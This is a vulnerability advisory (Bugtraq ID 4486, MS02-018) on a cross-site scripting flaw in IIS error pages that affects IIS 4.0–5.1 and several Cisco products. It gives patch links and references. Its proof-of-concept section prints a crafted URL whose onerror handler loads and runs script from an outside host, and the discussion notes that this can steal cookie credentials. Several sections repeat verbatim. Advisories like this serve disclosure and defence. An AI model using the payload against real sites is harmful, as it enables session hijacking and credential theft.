Microsoft IIS HTTP Error Page Cross Site Scripting Vulnerability
BID:4486
Info
Microsoft IIS HTTP Error Page Cross Site Scripting Vulnerability
| Bugtraq ID: | 4486 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 10 2002 12:00AM |
| Updated: | Apr 10 2002 12:00AM |
| Credit: | Published in Microsoft Security Bulletin MS02-018. Credit for discovery has been given to Thor Larholm <[email protected]>. |
| Vulnerable: |
Microsoft IIS 5.1 Microsoft IIS 5.0 Microsoft IIS 4.0 Cisco Unity Server 2.4 Cisco Unity Server 2.3 Cisco Unity Server 2.2 Cisco Unity Server 2.1 Cisco Unity Server 2.0 Cisco Call Manager 3.2 Cisco Call Manager 3.1 Cisco Call Manager 3.0 Cisco Building Broadband Service Manager (BBSM) 5.1 Cisco Building Broadband Service Manager (BBSM) 5.0 Cisco Building Broadband Service Manager (BBSM) 4.5 Cisco Building Broadband Service Manager (BBSM) 4.4 Cisco Building Broadband Service Manager (BBSM) 4.3 Cisco Building Broadband Service Manager (BBSM) 4.2 Cisco Building Broadband Service Manager (BBSM) 4.0.1 |
| Not Vulnerable: | |
Discussion
Microsoft IIS HTTP Error Page Cross Site Scripting Vulnerability
A Cross Site Scripting issue exists in some versions of IIS. The HTTP Error Page created by IIS may, under some circumstances, contain HTML content which includes unsanitized user supplied input.
An attacker may construct a link to a vulnerable server such that it exploits this vulnerability. When an innocent user follows this link, the script code will be reproduced by the server, and execute within the context of the vulnerable site. This may result in the exposure of sensitive data and cookie information, or allow the attacker to subvert the content and functionality of the site.
It has been reported that this issue may be exploited to steal cookie-based authentication credentials from users of a number of Microsoft domains/services (such as hotmail, passport, etc.).
A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves.
A Cross Site Scripting issue exists in some versions of IIS. The HTTP Error Page created by IIS may, under some circumstances, contain HTML content which includes unsanitized user supplied input.
An attacker may construct a link to a vulnerable server such that it exploits this vulnerability. When an innocent user follows this link, the script code will be reproduced by the server, and execute within the context of the vulnerable site. This may result in the exposure of sensitive data and cookie information, or allow the attacker to subvert the content and functionality of the site.
It has been reported that this issue may be exploited to steal cookie-based authentication credentials from users of a number of Microsoft domains/services (such as hotmail, passport, etc.).
A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves.
Exploit / POC
Microsoft IIS HTTP Error Page Cross Site Scripting Vulnerability
The following example was provided:
http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;">[email protected]/SomeNonExistantPath
The above will include and execute http://jscript.dk/test.js on YOUR.TLD, provided that YOUR.TLD is served by an IIS installation.
The following example was provided:
http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;">[email protected]/SomeNonExistantPath
The above will include and execute http://jscript.dk/test.js on YOUR.TLD, provided that YOUR.TLD is served by an IIS installation.
Solution / Fix
Microsoft IIS HTTP Error Page Cross Site Scripting Vulnerability
Solution:
Microsoft has released a cumulative patch to address this issue and others.
There are reports of problems with the fixes for users who are running Microsoft IIS Site Server. A hotfix to address problems caused as a side effect of installing the cumulative patch has apparently been released by Microsoft. Any users who have experienced difficulties as a result of installing the cumulative patch are advised to contact Microsoft support and request hotfix Q317815.
Users of Cisco Unity products and Cisco Building Broadband Service Manager 4.x/5.x are advised to apply Microsoft's cumulative patch.
Microsoft IIS 4.0
Microsoft IIS 5.1
Microsoft IIS 5.0
Cisco Unity Server 2.0
Cisco Unity Server 2.1
Cisco Unity Server 2.2
Cisco Unity Server 2.3
Cisco Unity Server 2.4
Cisco Call Manager 3.0
Cisco Call Manager 3.1
Cisco Call Manager 3.2
Cisco Building Broadband Service Manager (BBSM) 4.0.1
Cisco Building Broadband Service Manager (BBSM) 4.2
Cisco Building Broadband Service Manager (BBSM) 4.3
Cisco Building Broadband Service Manager (BBSM) 4.4
Cisco Building Broadband Service Manager (BBSM) 4.5
Cisco Building Broadband Service Manager (BBSM) 5.0
Cisco Building Broadband Service Manager (BBSM) 5.1
Solution:
Microsoft has released a cumulative patch to address this issue and others.
There are reports of problems with the fixes for users who are running Microsoft IIS Site Server. A hotfix to address problems caused as a side effect of installing the cumulative patch has apparently been released by Microsoft. Any users who have experienced difficulties as a result of installing the cumulative patch are advised to contact Microsoft support and request hotfix Q317815.
Users of Cisco Unity products and Cisco Building Broadband Service Manager 4.x/5.x are advised to apply Microsoft's cumulative patch.
Microsoft IIS 4.0
-
Microsoft Q317636
Windows NT Server 4.0, Terminal Server Edition, Security Rollup Package
http://www.microsoft.com/ntserver/terminalserver/downloads/critical/q3 17636/default.asp -
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe
Microsoft IIS 5.1
-
Microsoft Q319733 IIS 5.1
http://download.microsoft.com/download/iis50/Patch/Q319733/WXP/EN-US/Q 319733_WXP_SP1_x86_ENU.exe
Microsoft IIS 5.0
-
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe
Cisco Unity Server 2.0
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe -
Microsoft Q319733 IIS 5.1
http://download.microsoft.com/download/iis50/Patch/Q319733/WXP/EN-US/Q 319733_WXP_SP1_x86_ENU.exe
Cisco Unity Server 2.1
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe -
Microsoft Q319733 IIS 5.1
http://download.microsoft.com/download/iis50/Patch/Q319733/WXP/EN-US/Q 319733_WXP_SP1_x86_ENU.exe
Cisco Unity Server 2.2
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe -
Microsoft Q319733 IIS 5.1
http://download.microsoft.com/download/iis50/Patch/Q319733/WXP/EN-US/Q 319733_WXP_SP1_x86_ENU.exe
Cisco Unity Server 2.3
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe -
Microsoft Q319733 IIS 5.1
http://download.microsoft.com/download/iis50/Patch/Q319733/WXP/EN-US/Q 319733_WXP_SP1_x86_ENU.exe
Cisco Unity Server 2.4
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe -
Microsoft Q319733 IIS 5.1
http://download.microsoft.com/download/iis50/Patch/Q319733/WXP/EN-US/Q 319733_WXP_SP1_x86_ENU.exe
Cisco Call Manager 3.0
Cisco Call Manager 3.1
Cisco Call Manager 3.2
Cisco Building Broadband Service Manager (BBSM) 4.0.1
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe -
Microsoft Q319733 IIS 5.1
http://download.microsoft.com/download/iis50/Patch/Q319733/WXP/EN-US/Q 319733_WXP_SP1_x86_ENU.exe
Cisco Building Broadband Service Manager (BBSM) 4.2
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe -
Microsoft Q319733 IIS 5.1
http://download.microsoft.com/download/iis50/Patch/Q319733/WXP/EN-US/Q 319733_WXP_SP1_x86_ENU.exe
Cisco Building Broadband Service Manager (BBSM) 4.3
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe -
Microsoft Q319733 IIS 5.1
http://download.microsoft.com/download/iis50/Patch/Q319733/WXP/EN-US/Q 319733_WXP_SP1_x86_ENU.exe
Cisco Building Broadband Service Manager (BBSM) 4.4
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe -
Microsoft Q319733 IIS 5.1
http://download.microsoft.com/download/iis50/Patch/Q319733/WXP/EN-US/Q 319733_WXP_SP1_x86_ENU.exe
Cisco Building Broadband Service Manager (BBSM) 4.5
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe -
Microsoft Q319733 IIS 5.1
http://download.microsoft.com/download/iis50/Patch/Q319733/WXP/EN-US/Q 319733_WXP_SP1_x86_ENU.exe
Cisco Building Broadband Service Manager (BBSM) 5.0
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe -
Microsoft Q319733 IIS 5.1
http://download.microsoft.com/download/iis50/Patch/Q319733/WXP/EN-US/Q 319733_WXP_SP1_x86_ENU.exe
Cisco Building Broadband Service Manager (BBSM) 5.1
-
Microsoft Q319733 IIS 4.0
http://download.microsoft.com/download/iis40/Patch/Q319733/NT4/EN-US/Q 319733i.exe -
Microsoft Q319733 IIS 5.0
http://download.microsoft.com/download/iis50/Patch/Q319733/NT5/EN-US/Q 319733_W2K_SP3_X86_EN.exe -
Microsoft Q319733 IIS 5.1
http://download.microsoft.com/download/iis50/Patch/Q319733/WXP/EN-US/Q 319733_WXP_SP1_x86_ENU.exe
References
Microsoft IIS HTTP Error Page Cross Site Scripting Vulnerability
References:
References:
- IIS allows universal CrossSiteScripting Advisory (Thor Larholm)
- Microsoft Security Bulletin MS02-018 (Microsoft)
- Q317636 Windows NT Server 4.0, Terminal Server Edition, Security Rollup Package (Microsoft)
- Technet Security (Microsoft)
- Vulnerability Note VU#886699 (CERT/CC)